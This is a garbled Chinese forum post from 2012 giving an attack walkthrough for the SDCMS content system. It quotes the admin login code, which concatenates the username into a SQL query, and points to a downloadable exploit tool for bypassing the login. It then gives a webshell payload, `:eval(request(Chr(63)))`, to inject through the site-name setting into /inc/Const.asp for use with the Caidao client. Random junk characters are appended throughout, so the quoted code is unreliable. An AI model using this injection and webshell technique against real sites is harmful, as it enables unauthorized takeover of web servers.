作者:T00LS 鬼哥; K8 H" ?5 j3 M4 c: [- H( e- J
漏洞文件:后台目录/index.asp
8 r# X( I1 ]* D- P0 R/ ~) O# ]6 h( P- q G% n6 {. l+ r" z
Sub Check8 h) }. {5 ?; }0 I
Dim username,password,code,getcode,Rs. L2 ]4 N5 R$ ^0 P, u1 d' X i/ X
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub- V6 l7 c: t* {/ o& P) _1 m- n
username=FilterText(Trim(Request.Form("username")),1)
* u7 V: m) k! W6 d6 B% \ password=FilterText(Trim(Request.Form("password")),1)
" K& I4 O) l& P! ^4 J4 U code=Trim(Request.Form("yzm"))
1 D" s- K) w) U, z/ O5 e getcode=Session("SDCMSCode")- k) M' y, w4 j9 l: u
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died+ E. r" a6 `- t. e
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
( s- X. j: F" b0 E IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied6 p3 {3 g; p/ y$ R9 y
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied e6 i2 r. w, L/ q* ]
IF username="" or password="" Then, t% s# S. L: Y; }0 w
Echo "用户名或密码不能为空"ied: H7 L4 E: C: D
Else
) m5 w+ B, P( e; ?4 M: f0 s3 k+ } Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
0 U5 C9 n) I" j IF Rs.Eof Then2 I9 @- F9 f; _2 D
AddLog username,GetIp,"登录失败",1
+ W) C6 @; ] U) {" |$ J: \0 \7 J Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
# p1 ~( B2 o* n! d: p5 \ Else' K( e/ W1 q$ |
Add_Cookies "sdcms_id",Rs(0)( Q3 r; A M4 \8 S: y/ Q
Add_Cookies "sdcms_name",username& J* B& Y- l3 p* V7 K- j) K. d
Add_Cookies "sdcms_pwd",Rs(2)0 o. G! V; u4 H, w8 p' ]. T# [
Add_Cookies "sdcms_admin",Rs(3)
4 Y) e) }" D4 n) u- s Add_Cookies "sdcms_alllever",Rs(4)
4 P0 F2 U( h! D5 S3 i Add_Cookies "sdcms_infolever",Rs(5)% K7 V* l, w6 {. W6 D S ]
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")& y U m& m3 H/ d
AddLog username,GetIp,"登录成功",1
/ X1 J" f, N& j$ \% j% K% u) u '自动删除30天前的Log记录
8 P$ z1 \6 z/ H' @# A IF Sdcms_DataType Then
5 V, c4 q X( q. q0 S. t; @: F Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
9 j3 ]9 W p- F4 q5 v5 I3 @! S( l Else
# Z8 X3 |: |1 T' Z4 R: t Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")# m: L0 K+ _' ?8 k
End IF
( Q8 T" y8 z7 h. w% b$ c Go("sdcms_index.asp")
6 N; e/ k3 @ C g$ O. _ End IF8 A! o" I, |1 ]
Rs.Close) ?3 _5 `1 Y' A" y6 Q2 N
Set Rs=Nothing* g1 N* \2 L5 h9 c( T7 l9 m* ~: T
End IF
9 I4 V) _% s4 b( u" dEnd Sub4 t. x% p* j4 r9 c' E0 [, e- y
! @, E8 j. e( E# x
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
3 u) _3 B, R4 d0 C# e- P' X
% U( Y, M5 V2 I( D6 _+ V+ ^* j) nFunction FilterText(ByVal t0,ByVal t1)1 X, t2 _1 ]" `7 a* Q6 b% x# _
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function f0 R) Y1 e+ {9 k( i
t0=Trim(t0)7 J; a% i2 P% L/ ~% a; u$ i
Select Case t1
G* a4 P$ V/ |0 X, E+ I: j* X Case "1"! m4 k2 }* ]; V$ ?) f" g
t0=Replace(t0,Chr(32),"")
# Y/ l6 L( v, }4 [# q t0=Replace(t0,Chr(13),""). S$ s) D" h2 o9 ]7 N+ C
t0=Replace(t0,Chr(10)&Chr(10),"")
$ |: T) p" z1 _ H2 Q1 D/ L$ T" [ t0=Replace(t0,Chr(10),"")
2 o" J! [, }2 t7 D* u Case "2"* i+ ~ {0 E3 [# Q- C+ [; x- s. H
t0=Replace(t0,Chr(8),"")'回格
: g9 R6 H1 d: |' f6 v3 F5 ?) U t0=Replace(t0,Chr(9),"")'tab(水平制表符)3 P& s+ a: ~8 s: Y$ W
t0=Replace(t0,Chr(10),"")'换行9 k8 V3 b$ u; k: e
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)0 {& f& L0 s- J* e* S1 p& @# d3 K
t0=Replace(t0,Chr(12),"")'换页
, p% c. i) p8 g" L9 k3 A t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
# l/ B: Y) ^, j* Z; R1 y9 d0 T t0=Replace(t0,Chr(22),"")8 L3 @3 ^+ ^- ?" @
t0=Replace(t0,Chr(32),"")'空格 SPACE
' P; U. L1 S7 R7 U, ~2 y t0=Replace(t0,Chr(33),"")'!- ?: L% ?; q1 r' i/ | C
t0=Replace(t0,Chr(34),"")'"
3 V2 S% O$ H5 t1 h2 C; w t0=Replace(t0,Chr(35),"")'#! J1 M' D$ [% `" u# g* ]
t0=Replace(t0,Chr(36),"")'$
4 [3 f: z+ R: w) \9 P% a5 \ t0=Replace(t0,Chr(37),"")'%
* c' u% E% O& F3 i: ^) U: t t0=Replace(t0,Chr(38),"")'&
6 @( o' ~, b/ `4 Z& r t0=Replace(t0,Chr(39),"")''+ W. \1 j" |1 g) j5 Q6 W* A
t0=Replace(t0,Chr(40),"")'(' i! g6 |2 s1 i7 K
t0=Replace(t0,Chr(41),"")')
6 x, F- U/ o' ~# I: {) a0 K1 N t0=Replace(t0,Chr(42),"")'*
, }3 t! }# _) h: a) ^9 c' E/ i t0=Replace(t0,Chr(43),"")'+ ?9 s/ u8 ]" }: V* _! @4 K! g
t0=Replace(t0,Chr(44),"")',
& U4 N+ L" k( K+ |: y- F t0=Replace(t0,Chr(45),"")'-
1 O9 d4 C V: } t0=Replace(t0,Chr(46),"")'.
' ~" O7 P; g J+ N6 {- a* V t0=Replace(t0,Chr(47),"")'/7 F0 o( a q: U
t0=Replace(t0,Chr(58),"")':* ]7 F; p* h2 r9 v' {5 Y: ?
t0=Replace(t0,Chr(59),"")';
9 }8 ^6 H( J; P& m t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>& J3 V' O, D& P5 `+ n ~/ J
t0=Replace(t0,Chr(63),"")'?
/ f9 M. S: I0 x1 S t0=Replace(t0,Chr(64),"")'@6 f7 v1 O* X4 b3 }( ]! _/ f0 t
t0=Replace(t0,Chr(91),"")'\1 @, r( h: U5 f$ ? s
t0=Replace(t0,Chr(92),"")'\! t7 _* Z( H' @: d v( h9 I8 {
t0=Replace(t0,Chr(93),"")']
: [$ N: Y# z% B" Y7 {! R, J% N t0=Replace(t0,Chr(94),"")'^1 w6 Z4 C" c/ s; d# v2 ?
t0=Replace(t0,Chr(95),"")'_& z$ d/ L7 e# b
t0=Replace(t0,Chr(96),"")'`( j7 Q+ M# i; Y
t0=Replace(t0,Chr(123),"")'{0 B; a/ k) M2 j N$ r+ }5 g" q, M# O
t0=Replace(t0,Chr(124),"")'|# h- ^# x* ^+ F+ W& e1 w& s
t0=Replace(t0,Chr(125),"")'}
( L$ O7 R/ ~) @0 X; D t0=Replace(t0,Chr(126),"")'~
, A2 Q) V2 P9 N9 ]1 V D" Y; e( h0 A- H Case Else- m8 t6 F7 F- s# @: ]
t0=Replace(t0, "&", "&")6 g; u/ I8 _) c1 J! e+ ~
t0=Replace(t0, "'", "'"): `9 b9 d* |. Z3 O/ o- [' }
t0=Replace(t0, """", """)* @' T- `0 E9 t
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")) G9 t; \8 h+ W, ~
End Select
0 y& u* ^% G5 n/ Q3 |/ ~ IF Instr(Lcase(t0),"expression")>0 Then# h3 a# }2 `0 e' {+ h, b& v
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
5 c4 e" F0 d* U! t7 ^ End If
2 N' C2 i7 }: D, R9 [+ Z FilterText=t0, \" v8 {2 [* T( l$ K5 Y* P
End Function O7 B- c; |1 ?
1 F# M* v0 ^" L- K- ]* v, T$ G
看到没。直接参数是1 只过滤0 ^1 k q& q9 j$ ~
t0=Replace(t0,Chr(32)," ")* ~6 T0 h" P$ L1 J8 m v
t0=Replace(t0,Chr(13),"")
" c* o. ]4 W" n- g t0=Replace(t0,Chr(10)&Chr(10),"
8 ~" J) K# e h0 Z")
# y' p# Z5 Q4 K7 W( V t0=Replace(t0,Chr(10),"5 m [! |& m0 ?
")( ], u2 f( f V7 K; @( ?- c, J" u
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
# C: l% Q0 j$ P* s6 }EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP, t8 L+ N, } Z! p9 T9 n8 Y
2 H0 o1 }$ h2 d3 Y% `4 m3 l3 a测试:
, O+ g$ a" i) s m: x
3 P5 C% }+ S" x4 W. U2 t0 u2 _) }1 @: n0 o. _* P" y- l
现在输入工具上验证码,然后点OK4 q5 g8 U( S6 }* h$ G2 s
5 a5 o' M. E& Y
! n6 z1 @7 e6 b6 T4 R) u: G看到我们直接进入后台管理界面了,呵呵!$ w; q1 h( l: T7 a$ f4 ^' p# i' j3 H
6 g. a7 y1 ^( [3 [0 Y
% x6 F, u3 c) h& Y0 m* e# `4 s) k
( j4 G: R5 k8 _4 ~) B这样直接进入后台了。。。。
0 r( s% h7 M3 X4 S4 k3 F
+ q9 W/ l7 ~: n0 t 2 n9 t. x- Y2 }7 W! y1 `. j: H$ l0 v
8 P& R! C. o- _
SDCMS提权:
8 U9 j1 F9 G( B; M# b2 z. Q# Z$ ~9 K" |7 x. i2 A$ t
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?$ v, R4 f. H* B' a" H
. o6 j' w- {- O8 t# a6 a6 A! y$ i3 P3 p+ }5 D4 N0 h! u- G5 P; c! L
+ @* D* Y1 P" |; w/ a9 jOK,现在用菜刀连接下!2 ^6 N5 G3 B- g1 E& T6 W
: B; Z' ^* s) @% O
) M/ p) M9 k* h2 F4 E5 z- v0 P% r( i6 q* @0 a/ T
# W$ G6 D4 k, |8 k( d1 Z8 ], ^/ l8 p: Y0 _9 g
|
发表于 2012-11-9 20:57:02
收藏
支持
反对